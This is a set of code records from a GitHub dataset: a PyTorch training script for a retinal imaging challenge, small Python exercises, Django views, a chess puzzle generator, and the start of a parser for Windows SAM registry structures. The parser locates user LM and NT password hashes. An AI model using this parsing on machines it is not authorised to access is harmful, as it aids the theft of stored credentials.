folder name with leading zeros\n img_folder = os.path.join(\n self.root_dir, img_folder_name\n ) # Get the path to the image folder\n print(\"Loading train images:\", img_folder)\n img_files = glob.glob(\n os.path.join(img_folder, \"*.jpg\")\n ) # Get the list of image files\n img_files_sorted = sorted(\n img_files,\n key=lambda x: int(\n os.path.splitext(os.path.basename(x))[0].split(\"_\")[0]\n ), # Sort the image files based on the numeric prefix in their names\n )\n\n images = []\n for i in range(0, len(img_files_sorted), len(img_files_sorted) // 128):\n img_file = img_files_sorted[i]\n image = Image.open(img_file)\n image = np.asarray(image) / 255.0\n image = np.transpose(image)\n image = image.astype(np.float32)\n 
images.append(image)\n image_slices.append(images)\n\n return image_slices\n\n def __len__(self):\n return len(self.se_map_values)\n\n def __getitem__(self, idx):\n image_slices = self.image_slices[idx]\n\n if self.transform:\n image_slices_pil = [\n to_pil_image(image_slice) for image_slice in image_slices\n ]\n image_slices_transformed = [\n self.transform(image_slice) for image_slice in image_slices_pil\n ]\n image_slices_transformed = torch.stack(image_slices_transformed).squeeze()\n else:\n image_slices_transformed = torch.tensor(image_slices)\n\n se_map_value = self.se_map_values.iloc[idx, 1:53].values.reshape(-1, 1)\n record = self.records.iloc[idx, 4:5].values\n\n if record[0] == \"normal\":\n record[0] = [0]\n elif record[0] == \"early\":\n record[0] = [1]\n elif record[0] == \"intermediate\":\n record[0] = [2]\n elif record[0] == \"advanced\":\n record[0] = [3]\n\n se_map_value = torch.from_numpy(se_map_value)\n record = torch.tensor(record[0])\n\n sample = {\n \"image\": image_slices_transformed,\n \"record\": record,\n \"se_map_value\": se_map_value,\n }\n return sample\n\n\nclass StageValDataset(Dataset):\n def __init__(self, excel_file, sheet_name, root_dir, data_info, transform=None):\n # total_rows = pd.read_excel(excel_file, sheet_name=sheet_name).shape[0]\n # skip_rows = total_rows - 10\n\n self.se_map_values = pd.read_excel(\n excel_file, sheet_name=sheet_name, skiprows=181\n ) # Load the SE map values from an Excel file, skipping the first 181 rows\n self.records = pd.read_excel(\n data_info, sheet_name=sheet_name, skiprows=181\n ) # Load the records from an Excel file, skipping the first 181 rows\n self.root_dir = root_dir\n self.transform = transform\n self.image_slices = self.load_image_slices() # Load the image slices\n\n def load_image_slices(self):\n image_slices = []\n for idx in range(181, 201): # Iterate over a specific range of indices\n img_folder_name = str(idx).zfill(\n 4\n ) # Format the folder name with leading zeros\n img_folder = os.path.join(\n self.root_dir, img_folder_name\n ) # Get the path to the image folder\n print(\"Loading val images:\", img_folder)\n img_files = glob.glob(\n os.path.join(img_folder, \"*.jpg\")\n ) # Get the list of image files\n img_files_sorted = sorted(\n img_files,\n key=lambda x: int(\n os.path.splitext(os.path.basename(x))[0].split(\"_\")[0]\n ), # Sort the image files based on the numeric prefix in their names\n )\n\n images = []\n for i in range(0, len(img_files_sorted), len(img_files_sorted) // 128):\n img_file = img_files_sorted[i]\n image = Image.open(img_file)\n image = np.asarray(image) / 255.0\n image = np.transpose(image)\n image = image.astype(np.float32)\n images.append(image)\n image_slices.append(images)\n\n return image_slices\n\n def __len__(self):\n return len(self.se_map_values)\n\n def __getitem__(self, idx):\n image_slices = self.image_slices[idx]\n\n if self.transform:\n image_slices_pil = [\n to_pil_image(image_slice) for image_slice in image_slices\n ]\n image_slices_transformed = [\n self.transform(image_slice) for image_slice in image_slices_pil\n ]\n image_slices_transformed = torch.stack(image_slices_transformed).squeeze()\n else:\n image_slices_transformed = torch.tensor(image_slices)\n\n se_map_value = self.se_map_values.iloc[idx, 1:53].values.reshape(-1, 1)\n se_map_value = torch.from_numpy(se_map_value)\n\n record = self.records.iloc[idx, 4:5].values\n\n if record[0] == \"normal\":\n record[0] = [0]\n elif record[0] == \"early\":\n record[0] = [1]\n elif record[0] == \"intermediate\":\n 
record[0] = [2]\n elif record[0] == \"advanced\":\n record[0] = [3]\n record = torch.tensor(record[0])\n\n sample = {\n \"image\": image_slices_transformed,\n \"record\": record,\n \"se_map_value\": se_map_value,\n }\n\n return sample\n\n\n# Parsing command-line arguments\nparser = argparse.ArgumentParser(\n description=\"MICCAI2023 Challenge: STAGE, task 2 baseline training script\"\n)\nparser.add_argument(\n \"--excel-file\",\n type=str,\n required=True,\n help=\"Path to the Excel file with annotations\",\n)\nparser.add_argument(\n \"--sheet-name\",\n type=int,\n default=0,\n required=True,\n help=\"Name of the sheet containing the data\",\n)\nparser.add_argument(\n \"--root-dir\", type=str, required=True, help=\"Directory with all the images\"\n)\nparser.add_argument(\n \"--learning-rate\",\n type=float,\n default=0.0001,\n help=\"Learning rate for the optimizer\",\n)\nparser.add_argument(\n \"--num-epochs\", type=int, default=20, help=\"Number of epochs for training\"\n)\nparser.add_argument(\n \"--batch-size\", type=int, default=64, help=\"Batch size for training\"\n)\nparser.add_argument(\n \"--warmup-epochs\", type=int, default=40, help=\"Number of warm-up epochs\"\n)\nparser.add_argument(\n \"--min-lr\", type=float, default=0.00001, help=\"Minimum learning rate\"\n)\n\nargs = parser.parse_args()\n\n\ndef adjust_learning_rate(optimizer, epoch, args):\n \"\"\"Decay the learning rate based on the schedule\"\"\"\n if epoch < args.warmup_epochs:\n lr = args.learning_rate * epoch / args.warmup_epochs\n else:\n lr = args.min_lr + (args.learning_rate - args.min_lr) * 0.5 * (\n 1\n + math.cos(\n math.pi\n * (epoch - args.warmup_epochs)\n / (args.num_epochs - args.warmup_epochs)\n )\n )\n\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = lr\n\n\n# Data transforms\ntransform = transforms.Compose(\n [\n # transforms.Resize((512, 512)),\n transforms.CenterCrop((512, 512)), # Add a central crop\n # transforms.RandomGrayscale(p=0.2),\n transforms.RandomHorizontalFlip(),\n # transforms.RandomVerticalFlip(),\n transforms.ToTensor(),\n # transforms.Normalize(mean=[0.5], std=[0.5])\n ]\n)\n\n# Set device\ndevice = torch.device(\"cuda:7\" if torch.cuda.is_available() else \"cpu\")\n\n\nclass CustomMSELoss(nn.Module):\n def __init__(self):\n super(CustomMSELoss, self).__init__()\n\n def forward(self, prediction, label):\n mask = torch.ones_like(label)\n mask[label == 0] = 5\n loss = torch.mean(mask * (prediction - label) ** 2)\n return loss\n\n\nloss_func = CustomMSELoss()\n\n# loss_func = nn.MSELoss()\n\nloss_func_name = \"Mean squared error loss\"\n\n# Learning parameters\nlearn_rate = args.learning_rate\nnum_epochs = args.num_epochs\nbatch_size = args.batch_size\n\noptimizer_name = \"Adam\"\nstart_time = datetime.now()\n\nrun_id = \"checkpoint\"\nif os.path.exists(run_id):\n shutil.rmtree(run_id)\nos.mkdir(run_id)\n\nlog_dir = run_id + \"/logs\"\nwriter = SummaryWriter(log_dir=log_dir)\n\n# Write hyperparameters to a file\nwith open(run_id + \"/hyperparams.csv\", \"w\") as wfil:\n wfil.write(\"loss function, \" + loss_func_name + \"\\n\")\n wfil.write(\"learning rate (init), \" + str(learn_rate) + \"\\n\")\n wfil.write(\"number epochs, \" + str(num_epochs) + \"\\n\")\n wfil.write(\"batch size, \" + str(batch_size) + \"\\n\")\n wfil.write(\"optimizer, \" + optimizer_name + \"\\n\")\n wfil.write(\"start time, \" + str(start_time) + \"\\n\")\n\nNUM_CLASSES = 52\n\n# Create the Dual_network34 model\nmodel = Dual_efficientnet()\nprint(model)\n\n# Create the StageDataset for 
training\ntrain_set = StageDataset(\n excel_file=args.excel_file,\n sheet_name=args.sheet_name,\n root_dir=args.root_dir,\n data_info=\"STAGE_training/data_info_training.xlsx\",\n transform=transform,\n)\n\n# Create the StageValDataset for validation\nvalid_set = StageValDataset(\n excel_file=args.excel_file,\n sheet_name=args.sheet_name,\n root_dir=args.root_dir,\n data_info=\"STAGE_training/data_info_training.xlsx\",\n transform=transform,\n)\n\n# Create data loaders\ntrainloader = DataLoader(\n dataset=train_set, batch_size=batch_size, shuffle=False, num_workers=16\n)\nvalidloader = DataLoader(\n dataset=valid_set, batch_size=batch_size, shuffle=False, num_workers=16\n)\n\n# Freeze the first three layers of the model\nct = 0\nfor child in model.children():\n ct += 1\n if ct < 4:\n for param in child.parameters():\n param.require_grad = False\n\nmodel.to(device)\n\n# Optimizer and learning rate scheduler\noptimizer = optim.Adam(model.parameters(), lr=learn_rate)\nscheduler = ReduceLROnPlateau(\n optimizer, mode=\"min\", factor=0.75, patience=3, verbose=True\n)\n\nbest_valid_loss = \"unset\"\nbest_train_smape = float(\"inf\")\n\n# Log file for training progress\nwith open(run_id + \"/log_file.csv\", \"w\") as log_fil:\n log_fil.write(\"epoch,epoch duration,train loss,valid loss\\n\")\n\n # Training loop\n for epoch in range(num_epochs):\n epoch_start = datetime.now()\n epoch_train_loss = 0.0\n epoch_valid_loss = 0.0\n epoch_train_smape = 0.0\n\n # Training\n model.train()\n for i, sample in tqdm(enumerate(trainloader), total=len(trainloader)):\n images = sample[\"image\"]\n records = sample[\"record\"]\n labels = sample[\"se_map_value\"]\n\n images = images.to(device)\n records = records.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n\n outputs = model(images, records)\n train_labels = torch.squeeze(labels)\n loss = loss_func(outputs, train_labels.float())\n smape_score = smape(\n train_labels.detach().cpu().numpy(), outputs.detach().cpu().numpy()\n )\n\n loss.backward()\n optimizer.step()\n\n epoch_train_loss = epoch_train_loss + loss.item()\n epoch_train_smape += smape_score\n\n iteration = epoch * len(trainloader) + i\n writer.add_scalar(\"Train Loss\", loss.item(), iteration)\n writer.add_scalar(\n \"Train SMAPE\", epoch_train_smape / len(trainloader), epoch\n )\n\n # Validation\n model.eval()\n output_values = []\n with torch.no_grad():\n for i, sample in tqdm(enumerate(validloader), total=len(validloader)):\n images = sample[\"image\"]\n records = sample[\"record\"]\n labels = sample[\"se_map_value\"]\n images = images.to(device)\n records = records.to(device)\n labels = labels.to(device)\n valid_labels = torch.squeeze(labels)\n outputs = model(images, records)\n loss = loss_func(outputs, valid_labels.float())\n epoch_valid_loss = epoch_valid_loss + loss.item()\n output_values.extend(outputs.cpu().tolist())\n\n # Calculate SMAPE\n y_true = valid_labels.cpu().numpy()\n y_pred = np.array(outputs.cpu())\n smape_score = smape(y_true, y_pred)\n print(\"Valid SMAPE:\", smape_score)\n\n # Create a DataFrame from the output values\n df = pd.DataFrame(output_values)\n # Save the DataFrame to a CSV file\n df.to_csv(\"output_val.csv\", index=False)\n\n adjust_learning_rate(optimizer, epoch, args)\n\n scheduler.step(epoch_valid_loss)\n\n writer.add_scalar(\n \"Validation Loss\", epoch_valid_loss / (NUM_CLASSES * batch_size), epoch\n )\n\n epoch_end = datetime.now()\n epoch_time = (epoch_end - epoch_start).total_seconds()\n\n # if best_valid_loss == \"unset\" or 
epoch_valid_loss < best_valid_loss:\n # best_valid_loss = epoch_valid_loss\n # print(\"Save best model!\")\n # torch.save(model.state_dict(), run_id + \"/best_weights.pth\")\n\n # torch.save(model.state_dict(), run_id + \"/last_weights.pth\")\n\n if epoch_train_smape / len(trainloader) < best_train_smape:\n best_train_smape = epoch_train_smape / len(trainloader)\n print(\"Save best model!\")\n torch.save(model.state_dict(), run_id + \"/best_weights.pth\")\n\n torch.save(model.state_dict(), run_id + \"/last_weights.pth\")\n\n log_fil.write(\n str(epoch)\n + \",\"\n + str(epoch_time)\n + \",\"\n + str(epoch_train_loss / (NUM_CLASSES * batch_size))\n + \",\"\n + str(epoch_valid_loss / (NUM_CLASSES * batch_size))\n + \"\\n\"\n )\n\n print(\n \"epoch: \"\n + str(epoch)\n + \" - (\"\n + str(epoch_time)\n + \" seconds)\"\n + \"\\n\\ttrain loss: \"\n + str(epoch_train_loss / (NUM_CLASSES * batch_size) / len(train_set))\n + \"\\n\\tvalid loss: \"\n + str(epoch_valid_loss / (NUM_CLASSES * batch_size) / len(valid_set))\n )\n\nend_time = datetime.now()\nwith open(run_id + \"/hyperparams.csv\", \"a\") as wfil:\n wfil.write(\"end time,\" + str(end_time) + \"\\n\")\n","repo_name":"lixiang007666/STAGE_baseline2","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16175,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7633546092","text":"def B_S(A):\r\n \r\n Flag, n = True, len(A) - 1 #по сути - потенциальное количество перестановок одного значения\r\n while Flag: \r\n Flag = False #останется таким, как только итерация продёт без перестановок => сорт-ка будеьт завершена\r\n for i in range(n): \r\n if A[i] > A[i + 1]: \r\n A[i], A[i + 1] = A[i + 1], A[i] #пузырёк всплывает\r\n Flag = True \r\n n -= 1\r\n","repo_name":"polina031005/BubbleSort","sub_path":"сортировка пузырьком.py","file_name":"сортировка пузырьком.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10260882649","text":"import pandas as pd\nimport geopandas as gpd\nfrom tqdm import tqdm\nimport os\n\n\ndef main():\n \"\"\"\n After calling download_all_shapefiles, loop through the files and create a csv containing all the county and block information, and saving it to data/blocks.csv.xz\n \"\"\"\n dir = \"../data/shapefiles\"\n total_set = set()\n pbar = tqdm(os.listdir(dir))\n for f in pbar:\n pbar.set_description(\"Adding: %s\" % f)\n if not f.split(\".\")[-1] == \"zip\": # skip not zip files\n continue\n filepath = os.path.join(dir, f)\n df = gpd.read_file(filepath)\n total_set |= set(df[\"GEOID20\"])\n pbar.set_description(\"Total set length: %s\" % len(total_set))\n\n df = pd.DataFrame()\n df[\"GEOID20\"] = list(total_set)\n df = df.sort_values(by=\"GEOID20\")\n df.to_csv(\"../data/blocks.csv.xz\", index=False)\n return df\n\n\nif __name__ == \"__main__\":\n df = main()\n print(df)\n assert (\n len(df) == 8174955 # excluding island areas\n ) # tally from census tallies (https://www.census.gov/geographies/reference-files/time-series/geo/tallies.html)\n","repo_name":"uva-bi-sdad/national_address_database","sub_path":"code/retrieve_blocks.py","file_name":"retrieve_blocks.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9308697899","text":"# 6. 
Sum series\n# 1/1 + 2^2/2 + 3^3/3 + 4^4/4 + ... up to n terms\n\nn=int(input(\"Enter number of terms: \"))\n\n# Each term is i**i / i; e.g. for n=4:\n# 1/1 + 2*2/2 + 3*3*3/3 + 4*4*4*4/4 => 1 + 2 + 9 + 64 => 76\ntotal=0\nfor i in range(1, n+1):\n    a=float(i**i)/i\n    total=total+a\nprint(total)","repo_name":"nupoor01nawathey/Python","sub_path":"Beginner/6SumSeries.py","file_name":"6SumSeries.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"12222885258","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse\r\n# Create your views here.\r\n\r\ndef bienvenida(request):\r\n    saludo = {\r\n        'mensaje' : 'Bienvenido !'\r\n    }\r\n    return render(request, 'index.html', saludo)\r\n\r\ndef listado(request):\r\n\r\n    dicc = {\r\n        'Gatos': [\r\n            {'nombre': 'Figaro', 'raza' : 'persa', 'edad' : 4, 'genero' : 'macho', 'color' : 'blanco y negro', 'peso' : '4kl'},\r\n            {'nombre': 'Luna', 'raza' : 'callejero', 'edad' : 4, 'genero' : 'hembra', 'color' : 'tricolor', 'peso' : '4kl'},\r\n            {'nombre': 'Candy', 'raza' : 'persa', 'edad' : 4, 'genero' : 'hembra', 'color' : 'naranja', 'peso' : '4kl'},\r\n            {'nombre': 'Tom', 'raza' : 'Callejero', 'edad' : 4, 'genero' : 'macho', 'color' : 'plomo', 'peso' : '4kl'},\r\n        ]\r\n    }\r\n    return render(request, 'list.html', dicc)\r\n\r\n\r\ndef agregar(request):\r\n    return render(\r\n        request,\r\n        'wena.html'\r\n    )","repo_name":"Joander03/Backend","sub_path":"veterinaria/gatos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"70785682408","text":"import chess\nimport requests\nfrom io import StringIO\nfrom bs4 import BeautifulSoup\nimport chess.pgn\n# import chess.uci\nfrom chess.pgn import BaseVisitor\n\n\nclass ChessAPI:\n    def __init__(self, username, password):\n        self.session = requests.Session()\n        self.session.post('http://www.chess.com/login_check',\n                          data={\n                              '_username': username,\n                              '_password': password,\n                              '_timezone': 'America/Chicago',\n                              '_target_path': 'https://www.chess.com/home'\n                          })\n\n    def create_puzzle(self, board, moves):\n        game = chess.pgn.Game()\n        game.setup(board)\n        game.end().add_line(moves)\n\n        last_move = game.move\n        flip = game.board().turn is False # is it black's turn\n        exporter = chess.pgn.StringExporter(headers=True, variations=True, comments=False)\n        pgn_string = game.accept(exporter)\n        data = \"\"\"&-diagramtype:\nchessProblem\n&-colorscheme:\nbrown\n&-piecestyle:\n3dwood\n&-float:\nleft\n&-flip:\n%s\n&-prompt:\nfalse\n&-coords:\ntrue\n&-size:\n200\n&-lastmove:\n%s\n&-focusnode:\n&-beginnode:\n&-endnode:\n&-hideglobalbuttons:\nfalse\n&-pgnbody:\n%s\"\"\" % (str(flip).lower(), last_move, pgn_string)\n        response = self.session.post(\"https://www.chess.com/tinymce/api/get_diagram?id=new\", data={'textSetup': data})\n        return 'http://www.chess.com/emboard?id=%s' % int(response.content)\n\n    def get_games(self, member_name):\n        pass\n\n\nclass Puzzle:\n    def __init__(self, board, moves):\n        self.game = chess.pgn.Game()\n        self.game.setup(board)\n        self.game.end().add_line(moves)\n\n\nclass AnnotatedVisitor(BaseVisitor):\n    def __init__(self, api):\n        self.puzzles = []\n        self.api = api\n        self.last_board = None\n        self.moves = []\n        self.in_variation = False\n        self.severity = 0\n\n    def visit_move(self, board, move):\n        if not self.in_variation:\n            self.last_board = board\n            self.moves = []\n        else:\n            
self.moves.append(move)\n\n def begin_variation(self):\n self.in_variation = True\n\n def end_variation(self):\n self.in_variation = False\n self.puzzles.append((self.severity, self.api.create_puzzle(self.last_board, self.moves)))\n\n def visit_comment(self, comment):\n if 'inaccuracy' in comment.lower():\n self.severity = 1\n elif 'mistake' in comment.lower():\n self.severity = 2\n elif 'blunder' in comment.lower():\n self.severity = 4\n elif 'missed mate' in comment.lower():\n self.severity = 4\n\n\nclass AnalysisVisitor(BaseVisitor):\n def __init__(self, stockfish_path, max_time_per_move=1000, max_depth_per_move=20):\n self.info_handler = chess.uci.InfoHandler()\n self.engine = chess.uci.popen_engine(stockfish_path)\n self.engine.info_handlers.append(self.info_handler)\n self.engine.uci()\n self.engine.ucinewgame()\n self.max_time_per_move = max_time_per_move\n self.max_depth_per_move = max_depth_per_move\n self.puzzles = []\n\n def visit_move(self, board, move):\n self.engine.ucinewgame()\n self.engine.position(board)\n best_move, _ = self.engine.go(depth=self.max_depth_per_move, movetime=self.max_time_per_move / 3)\n\n board.push(move)\n self.engine.ucinewgame()\n self.engine.position(board)\n self.engine.go(depth=self.max_depth_per_move, movetime=self.max_time_per_move / 3)\n your_score = self.info_handler.info[\"score\"][1]\n board.pop()\n\n board.push(best_move)\n self.engine.ucinewgame()\n self.engine.position(board)\n self.engine.go(depth=self.max_depth_per_move, movetime=self.max_time_per_move / 3)\n ideal_score = self.info_handler.info[\"score\"][1]\n board.pop()\n\n create_puzzle = False\n use_all_moves = False\n if ideal_score.cp and your_score.cp:\n # No mates detected, just compare the scores\n absolute_difference = abs(ideal_score.cp - your_score.cp)\n if absolute_difference > 200:\n create_puzzle = True\n elif ideal_score.mate and ideal_score.mate > 0 and your_score.cp:\n # Ideal solution has a mate and yours doesn't - BLUNDER\n create_puzzle = True\n elif ideal_score.mate and your_score.mate:\n absolute_difference = ideal_score.mate - your_score.mate\n if absolute_difference > 1 and ideal_score.mate > 0:\n create_puzzle = True\n use_all_moves = True\n\n if create_puzzle:\n moves = [best_move] + self.info_handler.info['pv'][1]\n if not use_all_moves:\n moves = moves[:min(len(moves), 5)]\n else:\n moves = moves[:min(len(moves), 14)]\n self.puzzles.append(Puzzle(board, moves))\n\n","repo_name":"TomWerner/BlunderPuzzler","sub_path":"puzzler/ChessAPI.py","file_name":"ChessAPI.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20123942432","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\nimport io\n\nclass DOMAIN_ACCOUNT_F:\n\tdef __init__(self):\n\t\tself.revision = None\n\t\tself.unk1 = None\n\t\tself.creation_time = None\n\t\tself.domain_modified_count = None\n\t\tself.max_pw_age = None\n\t\tself.min_pw_age = None\n\t\tself.force_logoff = None\n\t\tself.lockout_duration = None\n\t\tself.lockout_observation_window = None\n\t\tself.unk2 = None\n\t\tself.next_rid = None\n\t\tself.pw_properties = None\n\t\tself.min_pw_length = None\n\t\tself.pw_history_length = None\n\t\tself.lockout_treshold = None\n\t\tself.unk3 = None\n\t\tself.server_state = None\n\t\tself.server_role = None\n\t\tself.uas_compatibility_req = None\n\t\tself.unk4 = None\n\t\tself.key_0 = None\n\t\n\t@staticmethod\n\tdef from_bytes(data):\n\t\treturn 
DOMAIN_ACCOUNT_F.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tdf = DOMAIN_ACCOUNT_F()\n\t\tdf.revision = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tdf.unk1 = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tdf.creation_time = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.domain_modified_count = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.max_pw_age = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.min_pw_age = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.force_logoff = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.lockout_duration = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.lockout_observation_window = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.unk2 = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.next_rid = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tdf.pw_properties = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tdf.min_pw_length = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.pw_history_length = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.lockout_treshold = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.unk3 = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.server_state = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tdf.server_role = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.uas_compatibility_req = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.unk4 = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\t\n\t\tpos = buff.tell()\n\t\tmarker = buff.read(1)\n\t\tbuff.seek(pos,0)\n\t\tif marker == b'\\x01':\n\t\t\tdf.key_0 = SAM_KEY_DATA.from_buffer(buff)\n\t\telif marker == b'\\x02':\n\t\t\tdf.key_0 = SAM_KEY_DATA_AES.from_buffer(buff)\n\t\treturn df\n\t\t\n\tdef __str__(self):\n\t\tt = '== DOMAIN_ACCOUNT_F ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n\t\t\nclass SAM_KEY_DATA:\n\tdef __init__(self):\n\t\tself.revision = None\n\t\tself.length = None\n\t\tself.salt = None\n\t\tself.key = None\n\t\tself.checksum = None\n\t\tself.reserved = None\n\t\n\t@staticmethod\n\tdef from_bytes(data):\n\t\treturn SAM_KEY_DATA.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tsk = SAM_KEY_DATA()\n\t\tsk.revision = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.length = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.salt = buff.read(16)\n\t\tsk.key = buff.read(16)\n\t\tsk.checksum = buff.read(16)\n\t\tsk.reserved = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\treturn sk\n\t\t\n\tdef __str__(self):\n\t\tt = '== SAM_KEY_DATA ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n\t\t\nclass SAM_KEY_DATA_AES:\n\tdef __init__(self):\n\t\tself.revision = None\n\t\tself.length = None\n\t\tself.checksum_length = None\n\t\tself.data_length = None\n\t\tself.salt = None\n\t\tself.data = None\n\t\n\t@staticmethod\n\tdef 
from_bytes(data):\n\t\treturn SAM_KEY_DATA_AES.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tsk = SAM_KEY_DATA_AES()\n\t\tsk.revision = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.length = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.checksum_length = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.data_length = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.salt = buff.read(16)\n\t\tsk.data = buff.read(sk.data_length)\n\t\treturn sk\n\t\t\n\tdef __str__(self):\n\t\tt = '== SAM_KEY_DATA_AES ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n\t\t\nclass USER_ACCOUNT_V:\n\tdef __init__(self):\n\t\tself.Unknown = None \n\t\tself.NameOffset = None \n\t\tself.NameLength = None \n\t\tself.Unknown2 = None \n\t\tself.FullNameOffset = None \n\t\tself.FullNameLength = None \n\t\tself.Unknown3 = None \n\t\tself.CommentOffset = None \n\t\tself.CommentLength = None \n\t\tself.Unknown31 = None \n\t\tself.UserCommentOffset = None \n\t\tself.UserCommentLength = None \n\t\tself.Unknown4 = None \n\t\tself.Unknown5 = None \n\t\tself.HomeDirOffset = None \n\t\tself.HomeDirLength = None \n\t\tself.Unknown6 = None \n\t\tself.HomeDirConnectOffset = None \n\t\tself.HomeDirConnectLength = None \n\t\tself.Unknown7 = None \n\t\tself.ScriptPathOffset = None \n\t\tself.ScriptPathLength = None \n\t\tself.Unknown8 = None \n\t\tself.ProfilePathOffset = None \n\t\tself.ProfilePathLength = None \n\t\tself.Unknown9 = None \n\t\tself.WorkstationsOffset = None \n\t\tself.WorkstationsLength = None \n\t\tself.Unknown10 = None \n\t\tself.HoursAllowedOffset = None \n\t\tself.HoursAllowedLength = None \n\t\tself.Unknown11 = None \n\t\tself.Unknown12 = None \n\t\tself.LMHashOffset = None \n\t\tself.LMHashLength = None \n\t\tself.Unknown13 = None \n\t\tself.NTHashOffset = None \n\t\tself.NTHashLength = None \n\t\tself.Unknown14 = None \n\t\tself.Unknown15 = None \n\t\tself.Data = None\n\t\t\n\t\tself.name = None\n\t\tself.fullname = None\n\t\tself.comment = None\n\t\tself.usercomment = None\n\t\tself.homedir = None\n\t\tself.homedir_connect = None\n\t\tself.script_path = None\n\t\tself.profile_path = None\n\t\tself.workstations = None\n\t\tself.hoursallowed = None\n\t\tself.LM_hash = None\n\t\tself.NT_hash = None\n\t\t\n\t@staticmethod\n\tdef from_bytes(data):\n\t\treturn USER_ACCOUNT_V.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tuac = USER_ACCOUNT_V()\t\t\n\t\tuac.Unknown = buff.read(12) \n\t\tuac.NameOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.NameLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown2 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.FullNameOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.FullNameLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown3 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.CommentOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.CommentLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown31 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.UserCommentOffset = int.from_bytes(buff.read(4), 'little', signed = False) 
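# note: the string-field offsets in this struct are relative to data_offset, the end of this fixed-size header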
